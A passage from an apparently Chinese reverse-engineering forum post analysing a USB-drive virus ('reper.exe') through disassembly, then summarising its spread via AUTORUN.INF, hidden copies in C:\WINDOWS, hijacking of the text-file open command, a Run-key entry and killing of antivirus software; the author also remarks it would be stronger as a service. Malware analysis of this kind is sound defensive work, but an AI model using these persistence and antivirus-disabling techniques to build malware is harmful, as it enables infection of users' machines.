EAX,EAX ; 根据我以前的病毒分析，他是在找“木马” “杀” 之类的词语…… 004139B2 . |74 56 JE SHORT reper.00413A0A 004139B4 . |8BF4 MOV ESI,ESP 004139B6 . |8D95 7CFBFFFF LEA EDX,DWORD PTR SS:[EBP-484] 004139BC . |52 PUSH EDX ; /pMsg 004139BD . |8B85 78FBFFFF MOV EAX,DWORD PTR SS:[EBP-488] ; | 004139C3 . |50 PUSH EAX ; |hAccel 004139C4 . |8B8D 7CFBFFFF MOV ECX,DWORD PTR SS:[EBP-484] ; | 004139CA . |51 PUSH ECX ; |hWnd 004139CB . |FF15 6C144300 CALL DWORD PTR DS:[<&USER32.TranslateAcc>; \TranslateAcceleratorA 004139D1 . |3BF4 CMP ESI,ESP 004139D3 . |E8 082EFFFF CALL reper.004067E0 004139D8 . |85C0 TEST EAX,EAX 004139DA . |75 2C JNZ SHORT reper.00413A08 004139DC . |8BF4 MOV ESI,ESP 004139DE . |8D95 7CFBFFFF LEA EDX,DWORD PTR SS:[EBP-484] 004139E4 . |52 PUSH EDX ; /pMsg 004139E5 . |FF15 70144300 CALL DWORD PTR DS:[<&USER32.TranslateMes>; \TranslateMessage //发送EXIT的MESSAGE？ 004139EB . |3BF4 CMP ESI,ESP 004139ED . |E8 EE2DFFFF CALL reper.004067E0 004139F2 . |8BF4 MOV ESI,ESP 004139F4 . |8D85 7CFBFFFF LEA EAX,DWORD PTR SS:[EBP-484] 004139FA . |50 PUSH EAX ; /pMsg 004139FB . |FF15 74144300 CALL DWORD PTR DS:[<&USER32.DispatchMess>; \DispatchMessageA 00413A01 . |3BF4 CMP ESI,ESP 00413A03 . |E8 D82DFFFF CALL reper.004067E0 00413A08 >^\EB 8A JMP SHORT reper.00413994 00413A0A > 8B85 84FBFFFF MOV EAX,DWORD PTR SS:[EBP-47C] 00413A10 > 5F POP EDI 00413A11 . 5E POP ESI 00413A12 . 5B POP EBX 00413A13 . 81C4 C8040000 ADD ESP,4C8 00413A19 . 3BEC CMP EBP,ESP 00413A1B . E8 C02DFFFF CALL reper.004067E0 00413A20 . 8BE5 MOV ESP,EBP 00413A22 . 5D POP EBP 00413A23 . C2 1000 RETN 10总结一下，病毒首先判断各盘有没有AUTORUN，有则KILL掉，然后再在各盘创建REPER.EXE和AUTORUN.INF，设置属性，系统，只读，隐藏再来在C:\WINDOWS下创建VIEREW.EXE和N0TEPAD.EXE，为每次启动和TXT做准备然后改注册表，在HEKY_CALSSES_BOOT\txtfile\shell\open\command下面的NOTEPAD改成自己的N0TEPAD.EXE, 再在Software\Microsoft\Windows\CurrentVersion\Run下创建RUNREPER项，让自己的VIEREW.EXE时时刻刻启动…… 最后再枚举杀毒软件的API，有就CUT掉…… 这回分析地很透彻了吧：）一个普通的U盘病毒，同志们谁牛自己研究熊猫去，我不敢：） =======================:>我是可爱的分隔线<:============================= 斑竹您要是+精（我都不敢说了……上次CCD狠狠地把我给DEBUG了一回……）还是把我的声望弄到10吧…… 看了看高手的破文，比我好多了……努力吧~自己…… =======================:>我是可爱的分隔线<:============================= Qbasic: CLS INPUT "Your Name,Please:",n$ PRINT CHR$(68)+CHR$(101)+CHR$(66)+CHR$(117)+CHR$(103)+CHR$(32)+CHR$(89)+CHR$(111)+CHR$(117)+CHR$(114)+CHR$(115)+CHR$(101)+CHR$(108)+CHR$(102)+"-----"+n$+CHR$(33)+CHR$(58)+CHR$(41)+CHR$(66)+CHR$(121)+CHR$(32)+CHR$(78)+CHR$(111)+CHR$(78)+CHR$(97)+CHR$(109)+CHR$(101)+CHR$(83)+CHR$(119)+CHR$(111)+CHR$(114)+CHR$(100)+CHR$(77)+ CHR$(97)+CHR$(110) END Vbasic: n$ = InputBox("Your Name,Please:") Print Chr$(68) + Chr$(101) + Chr$(66) + Chr$(117) + Chr$(103) + Chr$(32) + Chr$(89) + Chr$(111) + Chr$(117) + Chr$(114) + Chr$(115) + Chr$(101) + Chr$(108) + Chr$(102) + "-----" + n$ + Chr$(33) + Chr$(58) + Chr$(41) + Chr$(66) + Chr$(121) + Chr$(32) + Chr$(78) + Chr$(111) + Chr$(78) + Chr$(97) + Chr$(109) + Chr$(101) + Chr$(83) + Chr$(119) + Chr$(111) + Chr$(114) + Chr$(100) + Chr$(77) + Chr$(97) + Chr$(110) Please Wait for Pascal.....Today is too late,so I don't want to qj them..... =======================:>我是可爱的分隔线<:============================= 另：这个病毒的制作思路不好，应该+个服务：）（而且经实验，没什么威力，就是传染……） [培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

上一篇：航海及海运专业英语词汇(M1)
下一篇：外媒：法国政府将于本周拍卖 611 个比特币，价值约 3490 万美元

友情链接：